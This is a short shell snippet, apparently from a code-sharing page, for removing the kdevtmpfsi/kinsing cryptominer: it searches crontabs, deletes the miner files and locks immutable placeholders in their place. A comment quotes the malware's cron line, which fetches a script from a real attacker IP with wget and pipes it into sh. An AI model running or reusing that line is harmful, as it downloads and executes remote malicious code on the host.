futuri · March 8, 2021 02:05
diff --git a/Remove kdevtmpfsi b/Remove kdevtmpfsi
 #Search all crontabs
 find / -iname cron* -exec grep -R -nw '195.3.146.118' {} +
 find / -iname cron* -exec grep -R -nw 'wget -q' {} +

 # search results example
 # /var/spool/cron/crontabs
 # /var/spool/cron/apache

 # Comment or remove the line
 # * * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

 find / -iname kdevtmpfsi -exec rm -fv {} \;
 find / -iname kinsing -exec rm -fv {} \;

 touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing && touch /tmp/kinsing

 echo "hello" > /tmp/kdevtmpfsi && echo "hello" > /var/tmp/kinsing && echo "hello" > /tmp/kinsing

 cat /tmp/kdevtmpfsi && cat /var/tmp/kinsing && cat /tmp/kinsing

 chmod 1777 /var/tmp/kinsing && chmod 1777 /tmp/kdevtmpfsi && chmod 1777 /tmp/kinsing

 chattr +i /tmp/kdevtmpfsi && chattr +i /var/tmp/kinsing && chattr +i /tmp/kinsing

 # reboot